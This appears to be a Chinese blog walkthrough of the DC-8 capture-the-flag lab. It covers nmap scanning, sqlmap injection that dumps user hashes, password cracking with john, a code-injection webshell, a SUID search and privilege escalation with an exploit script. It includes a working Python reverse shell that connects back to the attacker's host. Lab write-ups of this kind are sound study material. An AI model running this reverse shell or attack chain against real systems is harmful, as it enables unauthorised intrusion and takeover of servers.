靶机信息
DC-8 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.
This challenge is a bit of a hybrid between being an actual challenge, and being a "proof of concept" as to whether two-factor authentication installed and configured on Linux can prevent the Linux server from being exploited.
The "proof of concept" portion of this challenge eventuated as a result of a question being asked about two-factor authentication and Linux on Twitter, and also due to a suggestion by @theart42.
The ultimate goal of this challenge is to bypass two-factor authentication, get root and to read the one and only flag.
You probably wouldn't even know that two-factor authentication was installed and configured unless you attempt to login via SSH, but it's definitely there and doing it's job.
Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.
For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won't give you the answer, instead, I'll give you an idea about how to move forward.信息收集
部署完靶机后扫描nmap获得ip地址,一个是kali的ip,另一个就是靶机的ip,之后再扫描主机的开放端口
#ping扫描网段内的主机
nmap -sP 10.0.0.0/24
#扫描主机端口
nmap -sV -p- 10.0.0.24
访问80端口
查看robots.txt
获取版本信息
发现存在sql注入漏洞
flag1
使用sqlmap进行sql注入
sqlmap -u 'http://10.0.0.24/?nid=2%27'
sqlmap -u 'http://10.0.0.24/?nid=2%27' -D d7db -T users -C name,pass --dump
使用john破解密码
john hash.txt
登录后台,找到代码注入点
存在代码注入漏洞,利用漏洞getshell
利用中国蚁剑进行连接
使用find命令查找特权命令
find / -perm -u=s -type f 2>/dev/null
搜索到漏洞利用这个命令进行提权
上传脚本到
/tmp目录,并反弹shell获得持久性shell
#python文件
import os,socket,subprocess
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('10.0.0.221',1234))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(['/bin/bash','-i'])
#执行文件
python /tmp/reverse.py
通过vi写入脚本,并执行提权脚本
./exp.sh -m setuid
./exp.sh -m netcat
Alipay
Wechat
最后一次更新于2021-03-08 16:33
0 条评论